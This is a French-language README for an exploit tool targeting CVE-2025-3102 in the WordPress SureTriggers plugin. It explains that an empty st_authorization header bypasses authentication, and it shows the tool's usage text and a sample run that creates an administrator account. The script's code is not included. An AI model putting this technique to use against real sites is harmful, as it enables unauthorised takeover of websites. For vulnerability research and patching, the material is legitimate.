
Wordpress SureTriggers <= 1.0.78 - Contournement d'autorisation en raison d'un manque de vérification de valeur vide, permettant la création d'utilisateurs administratifs non authentifiés
🚨 CVE-2025-3102 est une vulnérabilité critique de contournement d'authentification affectant le plugin WordPress SureTriggers: All-in-One Automation Platform, qui est activement installé sur plus de 100 000 sites web. En raison de la nature de la faille et de l'ampleur du déploiement, cette vulnérabilité présente un risque de sécurité important.
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:HLe plugin SureTriggers pour WordPress est vulnérable à un contournement d'authentification qui permet à des attaquants non authentifiés de créer des comptes administrateur. Cela est dû à une vérification manquante de la valeur vide sur le secret_key dans la fonction autheticate_user.
Lorsque le plugin est installé et activé mais non configuré avec une clé API, les attaquants peuvent contourner l'authentification en envoyant un en-tête st_authorization vide, déclenchant ainsi des actions réservées aux utilisateurs authentifiés.
Un script Python est fourni pour automatiser l'exploitation de cette vulnérabilité.
Ce script vous permet de générer un nouvel utilisateur administrateur sur les sites vulnérables.
readme.txtst_authorization videusage: CVE-2025-3102.py [-h] -u URL [-nmail NEWMAIL] [-nu NEWUSER] [-np NEWPASSWORD]
SureTriggers <= 1.0.78 - Authorization Bypass Exploit
By: Nxploited | Khaled Alenazi
options:
-h, --help Show this help message and exit
-u, --url URL Target WordPress base URL
-nmail, --newmail NEWMAIL Email to register
-nu, --newuser NEWUSER Username to register
-np, --newpassword NEWPASSWORD Password for the new user
[+] Detected plugin version: 1.0.78
[+] Vulnerable version detected. Proceeding...
[*] Exploiting the target in 3 seconds...
[+] Email generated: [email protected]
[+] Username generated: eviluser
[+] Password generated: P@ssw0rd123!
[+] Exploit Successful!
[+] Login credentials: eviluser:P@ssw0rd123!
Ce script est fourni uniquement à des fins éducatives.
L'utilisation non autorisée de ce code contre des cibles sans autorisation explicite est illégale.
L'auteur décline toute responsabilité en cas d'utilisation abusive ou de dommages causés.
Par : Nxploited ( Khaled Alenazi )